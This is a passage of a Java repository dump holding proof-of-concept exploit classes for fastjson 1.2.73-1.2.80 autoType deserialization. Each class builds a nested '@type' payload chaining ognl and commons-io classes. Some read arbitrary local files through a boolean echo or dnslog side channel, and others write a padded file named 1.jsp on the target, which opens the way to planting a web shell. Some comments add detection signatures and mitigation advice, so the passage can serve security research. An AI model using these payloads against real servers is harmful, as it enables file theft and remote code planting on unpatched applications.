19 | //依赖1.2.73-1.2.80 ognl-3.2.21 commons-io-2.2 根据报错不一样或者是否有dnslog/httplog来布尔读文件
20 | String poc1 ="[{\r\n"
21 | + " \"su15\": {\r\n"
22 | + " \"@type\": \"java.lang.Exception\",\r\n"
23 | + " \"@type\": \"ognl.OgnlException\",\r\n"
24 | + " }\r\n"
25 | + " }, {\r\n"
26 | + " \"su16\": {\r\n"
27 | + " \"@type\": \"java.lang.Class\",\r\n"
28 | + " \"val\": {\r\n"
29 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
30 | + " {\r\n"
31 | + " \"@type\": \"java.lang.String\"\r\n"
32 | + " \"@type\": \"ognl.OgnlException\",\r\n"
33 | + " \"_evaluation\": \"\"\r\n"
34 | + " }\r\n"
35 | + " }\r\n"
36 | + " },\r\n"
37 | + " {\r\n"
38 | + " \"su17\": {\r\n"
39 | + " \"@type\": \"ognl.Evaluation\",\r\n"
40 | + " \"node\": {\r\n"
41 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
42 | + " \"p\": {\r\n"
43 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
44 | + " \"stream\": {\r\n"
45 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
46 | + " \"delegate\": {\r\n"
47 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
48 | + " \"reader\": {\r\n"
49 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
50 | /*文件路径*/ + " \"url\": \"file:///D:/\"\r\n"
51 | + " },\r\n"
52 | + " \"charsetName\": \"UTF-8\",\r\n"
53 | + " \"bufferSize\": 1024\r\n"
54 | + " },\r\n"
55 | + " \"boms\": [{\r\n"
56 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
57 | + " \"charsetName\": \"UTF-8\",\r\n"
58 | + " \"bytes\": [\r\n"
59 | /*文件bytes*/ + " 36, 82\r\n"
60 | + " ]\r\n"
61 | + " }]\r\n"
62 | + " }\r\n"
63 | + " }\r\n"
64 | + " }\r\n"
65 | + " }\r\n"
66 | + " },\r\n"
67 | + " {\r\n"
68 | + " \"su18\": {\r\n"
69 | + " \"$ref\": \"$[2].su17.node.p.stream\"\r\n"
70 | + " }\r\n"
71 | + " },\r\n"
72 | + " {\r\n"
73 | + " \"su19\": {\r\n"
74 | + " \"$ref\": \"$[3].su18.bOM.bytes\"\r\n"
75 | + " }\r\n"
76 | + " },{\r\n"
77 | + " \"su20\": {\r\n"
78 | + " \"@type\": \"ognl.Evaluation\",\r\n"
79 | + " \"node\": {\r\n"
80 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
81 | + " \"p\": {\r\n"
82 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
83 | + " \"stream\": {\r\n"
84 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
85 | + " \"delegate\": {\r\n"
86 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
87 | + " \"reader\": {\r\n"
88 | + " \"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
89 | + " \"charSequence\": {\r\n"
90 | + " \"@type\": \"java.lang.String\" {\r\n"
91 | + " \"$ref\": \"$[4].su19\"\r\n"
92 | + " },\r\n"
93 | + " \"start\": 0,\r\n"
94 | + " \"end\": 0\r\n"
95 | + " },\r\n"
96 | + " \"charsetName\": \"UTF-8\",\r\n"
97 | + " \"bufferSize\": 1024\r\n"
98 | + " },\r\n"
99 | + " \"boms\": [{\r\n"
100 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
101 | + " \"charsetName\": \"UTF-8\",\r\n"
102 | + " \"bytes\": [1]\r\n"
103 | + " }]\r\n"
104 | + " }\r\n"
105 | + " }\r\n"
106 | + " }\r\n"
107 | + " }\r\n"
108 | + " },{\r\n"
109 | + " \"su21\": {\r\n"
110 | + " \"@type\": \"ognl.Evaluation\",\r\n"
111 | + " \"node\": {\r\n"
112 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
113 | + " \"p\": {\r\n"
114 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
115 | + " \"stream\": {\r\n"
116 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
117 | + " \"delegate\": {\r\n"
118 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
119 | + " \"reader\": {\r\n"
120 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
121 | /*dnslog*/ + " \"url\": \"http://127.0.0.1:5667\"\r\n"
122 | + " },\r\n"
123 | + " \"charsetName\": \"UTF-8\",\r\n"
124 | + " \"bufferSize\": 1024\r\n"
125 | + " },\r\n"
126 | + " \"boms\": [{\r\n"
127 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
128 | + " \"charsetName\": \"UTF-8\",\r\n"
129 | + " \"bytes\": [\r\n"
130 | + " 49\r\n"
131 | + " ]\r\n"
132 | + " }]\r\n"
133 | + " }\r\n"
134 | + " }\r\n"
135 | + " }\r\n"
136 | + " }\r\n"
137 | + " },\r\n"
138 | + " {\r\n"
139 | + " \"su22\": {\r\n"
140 | + " \"$ref\": \"$[6].su21.node.p.stream\"\r\n"
141 | + " }\r\n"
142 | + " },\r\n"
143 | + " {\r\n"
144 | + " \"su23\": {\r\n"
145 | + " \"$ref\": \"$[7].su22.bOM.bytes\"\r\n"
146 | + " }\r\n"
147 | + " }]";
148 |
149 |
150 |
151 | System.out.println(poc1);
152 | JSON.parseObject(poc1);
153 |
154 | }
155 | }
156 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson23_ognl_io_read_print.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.IOException;
3 | import java.io.InputStream;
4 | import java.net.URL;
5 | import java.util.Arrays;
6 | import java.util.Base64;
7 |
8 | import com.alibaba.fastjson.JSON;
9 |
10 | public class Fastjson23_ognl_io_read_print { // PoC: fastjson autoType ("@type") chain through ognl and commons-io classes; the echoed parse result is what leaks file data
11 | public static void main(String[] args) throws Exception, IOException{ // builds the payload string locally and hands it to JSON.parseObject; IOException is redundant next to Exception
12 |
13 | String url = "file:///D:/"; // same path the payload names below, read locally so the printed bytes can be compared against the parser's echo
14 | InputStream input = new URL(url).openStream(); // NOTE(review): never closed — try-with-resources would release the handle
15 | byte[] bs = new byte[input.available()]; // NOTE(review): available() is only an estimate and a single read() may return fewer bytes than requested
16 | input.read(bs);
17 | String test = Base64.getEncoder().encodeToString(bs); // unused in this file
18 | byte[] testbs = test.getBytes(); // unused; also uses the platform-default charset
19 | System.out.println(Arrays.toString(bs));
20 | System.out.println(new String(bs)); // platform-default charset
21 |
22 | // Depends on fastjson 1.2.73-1.2.80, ognl-3.2.21, commons-io-2.2. Needs response echo: the file is read boolean-style from differences in the echoed output (watch the su17/su18 fields)
23 | String poc1 ="{\r\n" // Detection: fully-qualified ognl.*, org.apache.commons.io.input.* and jdk.nashorn.* names inside "@type" values are the signature of this chain in request bodies
24 | + " \"su14\": {\r\n"
25 | + " \"@type\": \"java.lang.Exception\",\r\n"
26 | + " \"@type\": \"ognl.OgnlException\"\r\n" // two "@type" hints on one object — presumably the JDK type is what gets checked and the second name what gets instantiated; confirm against the parser
27 | + " },\r\n"
28 | + " \"su15\": {\r\n"
29 | + " \"@type\": \"java.lang.Class\",\r\n"
30 | + " \"val\": {\r\n"
31 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
32 | + " {\r\n"
33 | + " \"@type\": \"java.lang.String\"\r\n"
34 | + " \"@type\": \"ognl.OgnlException\",\r\n"
35 | + " \"_evaluation\": \"\"\r\n"
36 | + " }\r\n"
37 | + " },\r\n"
38 | + " \"su16\": {\r\n" // su16 carries the commons-io stream chain; su17/su18 below alias into it via $ref
39 | + " \"@type\": \"ognl.Evaluation\",\r\n"
40 | + " \"node\": {\r\n"
41 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
42 | + " \"p\": {\r\n"
43 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
44 | + " \"stream\": {\r\n"
45 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
46 | + " \"delegate\": {\r\n"
47 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
48 | + " \"reader\": {\r\n"
49 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
50 | /*file location*/+ " \"url\": \"file:///D:/\"\r\n" // the path read on the target; matches the local reference read above
51 | + " },\r\n"
52 | + " \"charsetName\": \"UTF-8\",\r\n"
53 | + " \"bufferSize\": 1024\r\n"
54 | + " },\r\n"
55 | + " \"boms\": [{\r\n"
56 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
57 | + " \"charsetName\": \"UTF-8\",\r\n"
58 | + " \"bytes\": [\r\n"
59 | /*file bytes*/ + " 36,82\r\n" // 36,82 = "$R": the leading bytes the target file is compared against in the boolean read described in the note above
60 | + " ]\r\n"
61 | + " }]\r\n"
62 | + " }\r\n"
63 | + " }\r\n"
64 | + " }\r\n"
65 | + " },\r\n"
66 | + " \"su17\": {\r\n"
67 | + " \"$ref\": \"$.su16.node.p.stream\"\r\n" // fastjson JSONPath reference back to the su16 BOMInputStream
68 | + " },\r\n"
69 | + " \"su18\": {\r\n"
70 | + " \"$ref\": \"$.su17.bOM.bytes\"\r\n" // resolved off the referenced stream; per the author's note this is the field whose echo differs
71 | + " }\r\n"
72 | + " }";
73 |
74 |
75 | System.out.println(poc1);
76 | System.out.println(JSON.parseObject(poc1)); // Sink: the vulnerable parse, and the echo the boolean read depends on. Mitigation: a fastjson release that no longer honours these @type hints, or safeMode (ParserConfig.setSafeMode), removes the autoType behaviour this PoC needs
77 |
78 |
79 | }
80 | }
81 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson24_ognl_io_write_1.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 |
6 | public class Fastjson24_ognl_io_write_1 { // PoC: fastjson autoType chain (ognl + commons-io 2.0-2.6) ending in a FileWriterWithEncoding — the file-write counterpart of the read chains
7 | public static void main(String[] args) throws Exception { // builds the payload string locally and hands it to JSON.parseObject
8 | // Depends on fastjson 1.2.73-1.2.80, ognl-3.2.21, commons-io-2.0-2.6
9 | String code = "test"; // content that ends up in the written file
10 | for (int i = 0; i < 8200; i++) { // pads the content past 8 KB — presumably the write threshold mentioned in Fastjson26's note; confirm
11 | code += "a"; // NOTE(review): quadratic String concatenation in a loop; a StringBuilder (or "a".repeat(8200) on Java 11+) yields the same string
12 | }
13 | String poc2 = " \r\n" // Detection: ognl.* and org.apache.commons.io.* class names inside "@type" values are the signature of this chain in request bodies
14 | + " {\r\n"
15 | + " \"su14\": {\r\n"
16 | + " \"@type\": \"java.lang.Exception\",\r\n"
17 | + " \"@type\": \"ognl.OgnlException\"\r\n"
18 | + " },\r\n"
19 | + " \"su15\": {\r\n"
20 | + " \"@type\": \"java.lang.Class\",\r\n"
21 | + " \"val\": {\r\n"
22 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
23 | + " {\r\n"
24 | + " \"@type\": \"java.lang.String\"\r\n"
25 | + " \"@type\": \"ognl.OgnlException\",\r\n"
26 | + " \"_evaluation\": \"\"\r\n"
27 | + " }\r\n"
28 | + " },\r\n"
29 | + " \"su16\": {\r\n" // su16 builds the full reader/tee chain once; su17-su19 alias into it via $ref
30 | + " \"@type\": \"ognl.Evaluation\",\r\n"
31 | + " \"node\": {\r\n"
32 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
33 | + " \"p\": {\r\n"
34 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
35 | + " \"stream\": {\r\n"
36 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
37 | + " \"delegate\": {\r\n"
38 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
39 | + " \"reader\": {\r\n"
40 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
41 | + " \"is\":{\r\n" // field is "is" here (commons-io 2.0-2.6); the 2.7/2.8 variant in Fastjson25 uses "inputStream"
42 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
43 | + " \"input\":{\r\n"
44 | + " \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
45 | + " \"reader\":{\r\n"
46 | + " \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
47 | + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n" // the padded content is embedded here as the CharSequenceReader source
48 | + " },\r\n"
49 | + " \"charsetName\":\"UTF-8\",\r\n"
50 | + " \"bufferSize\":1024\r\n"
51 | + " },\r\n"
52 | + " \"branch\":{\r\n" // the tee's branch: a WriterOutputStream over a file writer
53 | + " \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
54 | + " \"writer\":{\r\n"
55 | + " \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
56 | + " \"file\":\"1.jsp\",\r\n" // write target, relative to the parsing process's working directory. Detection: unexpected .jsp files appearing under the application's CWD
57 | + " \"encoding\":\"UTF-8\",\r\n"
58 | + " \"append\": false\r\n"
59 | + " },\r\n"
60 | + " \"charsetName\":\"UTF-8\",\r\n"
61 | + " \"bufferSize\": 1024,\r\n"
62 | + " \"writeImmediately\": true\r\n"
63 | + " },\r\n"
64 | + " \"closeBranch\": true\r\n"
65 | + " },\r\n"
66 | + " \"httpContentType\":\"text/xml\",\r\n"
67 | + " \"lenient\":false,\r\n"
68 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
69 | + " },\r\n"
70 | + " \"charsetName\": \"UTF-8\",\r\n"
71 | + " \"bufferSize\": 1024\r\n"
72 | + " },\r\n"
73 | + " \"boms\": [{\r\n"
74 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
75 | + " \"charsetName\": \"UTF-8\",\r\n"
76 | + " \"bytes\": [\r\n"
77 | + " 36,82\r\n"
78 | + " ]\r\n"
79 | + " }]\r\n"
80 | + " }\r\n"
81 | + " }\r\n"
82 | + " }\r\n"
83 | + " },\r\n"
84 | + " \"su17\": {\r\n" // su17-su19 repeat the reader chain and alias su16's input/branch streams via $ref
85 | + " \"@type\": \"ognl.Evaluation\",\r\n"
86 | + " \"node\": {\r\n"
87 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
88 | + " \"p\": {\r\n"
89 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
90 | + " \"stream\": {\r\n"
91 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
92 | + " \"delegate\": {\r\n"
93 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
94 | + " \"reader\": {\r\n"
95 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
96 | + " \"is\":{\r\n"
97 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
98 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
99 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
100 | + " \"closeBranch\": true\r\n"
101 | + " },\r\n"
102 | + " \"httpContentType\":\"text/xml\",\r\n"
103 | + " \"lenient\":false,\r\n"
104 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
105 | + " },\r\n"
106 | + " \"charsetName\": \"UTF-8\",\r\n"
107 | + " \"bufferSize\": 1024\r\n"
108 | + " },\r\n"
109 | + " \"boms\": [{\r\n"
110 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
111 | + " \"charsetName\": \"UTF-8\",\r\n"
112 | + " \"bytes\": [\r\n"
113 | + " 36,82\r\n"
114 | + " ]\r\n"
115 | + " }]\r\n"
116 | + " }\r\n"
117 | + " }\r\n"
118 | + " }\r\n"
119 | + " },\r\n"
120 | + " \"su18\": {\r\n"
121 | + " \"@type\": \"ognl.Evaluation\",\r\n"
122 | + " \"node\": {\r\n"
123 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
124 | + " \"p\": {\r\n"
125 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
126 | + " \"stream\": {\r\n"
127 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
128 | + " \"delegate\": {\r\n"
129 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
130 | + " \"reader\": {\r\n"
131 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
132 | + " \"is\":{\r\n"
133 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
134 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
135 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
136 | + " \"closeBranch\": true\r\n"
137 | + " },\r\n"
138 | + " \"httpContentType\":\"text/xml\",\r\n"
139 | + " \"lenient\":false,\r\n"
140 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
141 | + " },\r\n"
142 | + " \"charsetName\": \"UTF-8\",\r\n"
143 | + " \"bufferSize\": 1024\r\n"
144 | + " },\r\n"
145 | + " \"boms\": [{\r\n"
146 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
147 | + " \"charsetName\": \"UTF-8\",\r\n"
148 | + " \"bytes\": [\r\n"
149 | + " 36,82\r\n"
150 | + " ]\r\n"
151 | + " }]\r\n"
152 | + " }\r\n"
153 | + " }\r\n"
154 | + " }\r\n"
155 | + " },\r\n"
156 | + " \"su19\": {\r\n"
157 | + " \"@type\": \"ognl.Evaluation\",\r\n"
158 | + " \"node\": {\r\n"
159 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
160 | + " \"p\": {\r\n"
161 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
162 | + " \"stream\": {\r\n"
163 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
164 | + " \"delegate\": {\r\n"
165 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
166 | + " \"reader\": {\r\n"
167 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
168 | + " \"is\":{\r\n"
169 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
170 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
171 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
172 | + " \"closeBranch\": true\r\n"
173 | + " },\r\n"
174 | + " \"httpContentType\":\"text/xml\",\r\n"
175 | + " \"lenient\":false,\r\n"
176 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
177 | + " },\r\n"
178 | + " \"charsetName\": \"UTF-8\",\r\n"
179 | + " \"bufferSize\": 1024\r\n"
180 | + " },\r\n"
181 | + " \"boms\": [{\r\n"
182 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
183 | + " \"charsetName\": \"UTF-8\",\r\n"
184 | + " \"bytes\": [\r\n"
185 | + " 36,82\r\n"
186 | + " ]\r\n"
187 | + " }]\r\n"
188 | + " }\r\n"
189 | + " }\r\n"
190 | + " }\r\n"
191 | + " }, \r\n"
192 | + " }\r\n"
193 | + "";
194 | System.out.println(poc2);
195 |
196 | JSON.parseObject(poc2); // Sink: the vulnerable parse. Mitigation: fastjson safeMode (ParserConfig.setSafeMode) or a release that no longer honours these @type hints removes the autoType behaviour this PoC needs
197 | }
198 | }
199 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson25_ognl_io_write_2.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 |
6 | public class Fastjson25_ognl_io_write_2 { // PoC: same ognl + commons-io file-write chain as Fastjson24, with field names matching commons-io 2.7/2.8
7 | public static void main(String[] args) throws Exception { // builds the payload string locally and hands it to JSON.parseObject
8 | // Depends on fastjson 1.2.73-1.2.80, ognl-3.2.21, commons-io-2.7/2.8
9 | String code = "test"; // content that ends up in the written file
10 | for (int i = 0; i < 8200; i++) { // pads the content past 8 KB — presumably the write threshold mentioned in Fastjson26's note; confirm
11 | code += "a"; // NOTE(review): quadratic String concatenation in a loop; a StringBuilder (or "a".repeat(8200) on Java 11+) yields the same string
12 | }
13 | String poc1 = " \r\n" // Detection: ognl.* and org.apache.commons.io.* class names inside "@type" values are the signature of this chain in request bodies
14 | + " {\r\n"
15 | + " \"su14\": {\r\n"
16 | + " \"@type\": \"java.lang.Exception\",\r\n"
17 | + " \"@type\": \"ognl.OgnlException\"\r\n"
18 | + " },\r\n"
19 | + " \"su15\": {\r\n"
20 | + " \"@type\": \"java.lang.Class\",\r\n"
21 | + " \"val\": {\r\n"
22 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
23 | + " {\r\n"
24 | + " \"@type\": \"java.lang.String\"\r\n"
25 | + " \"@type\": \"ognl.OgnlException\",\r\n"
26 | + " \"_evaluation\": \"\"\r\n"
27 | + " }\r\n"
28 | + " },\r\n"
29 | + " \"su16\": {\r\n" // su16 builds the full reader/tee chain once; su17-su19 alias into it via $ref
30 | + " \"@type\": \"ognl.Evaluation\",\r\n"
31 | + " \"node\": {\r\n"
32 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
33 | + " \"p\": {\r\n"
34 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
35 | + " \"stream\": {\r\n"
36 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
37 | + " \"delegate\": {\r\n"
38 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
39 | + " \"reader\": {\r\n"
40 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
41 | + " \"inputStream\":{\r\n" // "inputStream" here versus "is" in Fastjson24 — the two files differ only in such commons-io version-specific field names
42 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
43 | + " \"input\":{\r\n"
44 | + " \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
45 | + " \"reader\":{\r\n"
46 | + " \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
47 | + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n" // the padded content is embedded here as the CharSequenceReader source
48 | + " \"start\":0,\r\n"
49 | + " \"end\":2147483647\r\n" // Integer.MAX_VALUE as the reader's end offset
50 | + " },\r\n"
51 | + " \"charsetName\":\"UTF-8\",\r\n"
52 | + " \"bufferSize\":1024\r\n"
53 | + " },\r\n"
54 | + " \"branch\":{\r\n" // the tee's branch: a WriterOutputStream over a file writer
55 | + " \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
56 | + " \"writer\":{\r\n"
57 | + " \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
58 | + " \"file\":\"1.jsp\",\r\n" // write target, relative to the parsing process's working directory. Detection: unexpected .jsp files appearing under the application's CWD
59 | + " \"charsetName\":\"UTF-8\",\r\n"
60 | + " \"append\": false\r\n"
61 | + " },\r\n"
62 | + " \"charsetName\":\"UTF-8\",\r\n"
63 | + " \"bufferSize\": 1024,\r\n"
64 | + " \"writeImmediately\": true\r\n"
65 | + " },\r\n"
66 | + " \"closeBranch\": true\r\n"
67 | + " },\r\n"
68 | + " \"httpContentType\":\"text/xml\",\r\n"
69 | + " \"lenient\":false,\r\n"
70 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
71 | + " },\r\n"
72 | + " \"charsetName\": \"UTF-8\",\r\n"
73 | + " \"bufferSize\": 1024\r\n"
74 | + " },\r\n"
75 | + " \"boms\": [{\r\n"
76 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
77 | + " \"charsetName\": \"UTF-8\",\r\n"
78 | + " \"bytes\": [\r\n"
79 | + " 36,82\r\n"
80 | + " ]\r\n"
81 | + " }]\r\n"
82 | + " }\r\n"
83 | + " }\r\n"
84 | + " }\r\n"
85 | + " },\r\n"
86 | + " \"su17\": {\r\n" // su17-su19 repeat the reader chain and alias su16's input/branch streams via $ref
87 | + " \"@type\": \"ognl.Evaluation\",\r\n"
88 | + " \"node\": {\r\n"
89 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
90 | + " \"p\": {\r\n"
91 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
92 | + " \"stream\": {\r\n"
93 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
94 | + " \"delegate\": {\r\n"
95 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
96 | + " \"reader\": {\r\n"
97 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
98 | + " \"inputStream\":{\r\n"
99 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
100 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
101 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
102 | + " \"closeBranch\": true\r\n"
103 | + " },\r\n"
104 | + " \"httpContentType\":\"text/xml\",\r\n"
105 | + " \"lenient\":false,\r\n"
106 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
107 | + " },\r\n"
108 | + " \"charsetName\": \"UTF-8\",\r\n"
109 | + " \"bufferSize\": 1024\r\n"
110 | + " },\r\n"
111 | + " \"boms\": [{\r\n"
112 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
113 | + " \"charsetName\": \"UTF-8\",\r\n"
114 | + " \"bytes\": [\r\n"
115 | + " 36,82\r\n"
116 | + " ]\r\n"
117 | + " }]\r\n"
118 | + " }\r\n"
119 | + " }\r\n"
120 | + " }\r\n"
121 | + " },\r\n"
122 | + " \"su18\": {\r\n"
123 | + " \"@type\": \"ognl.Evaluation\",\r\n"
124 | + " \"node\": {\r\n"
125 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
126 | + " \"p\": {\r\n"
127 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
128 | + " \"stream\": {\r\n"
129 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
130 | + " \"delegate\": {\r\n"
131 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
132 | + " \"reader\": {\r\n"
133 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
134 | + " \"inputStream\":{\r\n"
135 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
136 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
137 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
138 | + " \"closeBranch\": true\r\n"
139 | + " },\r\n"
140 | + " \"httpContentType\":\"text/xml\",\r\n"
141 | + " \"lenient\":false,\r\n"
142 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
143 | + " },\r\n"
144 | + " \"charsetName\": \"UTF-8\",\r\n"
145 | + " \"bufferSize\": 1024\r\n"
146 | + " },\r\n"
147 | + " \"boms\": [{\r\n"
148 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
149 | + " \"charsetName\": \"UTF-8\",\r\n"
150 | + " \"bytes\": [\r\n"
151 | + " 36,82\r\n"
152 | + " ]\r\n"
153 | + " }]\r\n"
154 | + " }\r\n"
155 | + " }\r\n"
156 | + " }\r\n"
157 | + " },\r\n"
158 | + " \"su19\": {\r\n"
159 | + " \"@type\": \"ognl.Evaluation\",\r\n"
160 | + " \"node\": {\r\n"
161 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
162 | + " \"p\": {\r\n"
163 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
164 | + " \"stream\": {\r\n"
165 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
166 | + " \"delegate\": {\r\n"
167 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
168 | + " \"reader\": {\r\n"
169 | + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
170 | + " \"inputStream\":{\r\n"
171 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
172 | + " \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
173 | + " \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
174 | + " \"closeBranch\": true\r\n"
175 | + " },\r\n"
176 | + " \"httpContentType\":\"text/xml\",\r\n"
177 | + " \"lenient\":false,\r\n"
178 | + " \"defaultEncoding\":\"UTF-8\"\r\n"
179 | + " },\r\n"
180 | + " \"charsetName\": \"UTF-8\",\r\n"
181 | + " \"bufferSize\": 1024\r\n"
182 | + " },\r\n"
183 | + " \"boms\": [{\r\n"
184 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
185 | + " \"charsetName\": \"UTF-8\",\r\n"
186 | + " \"bytes\": [\r\n"
187 | + " 36,82\r\n"
188 | + " ]\r\n"
189 | + " }]\r\n"
190 | + " }\r\n"
191 | + " }\r\n"
192 | + " }\r\n"
193 | + " } \r\n"
194 | + " }\r\n"
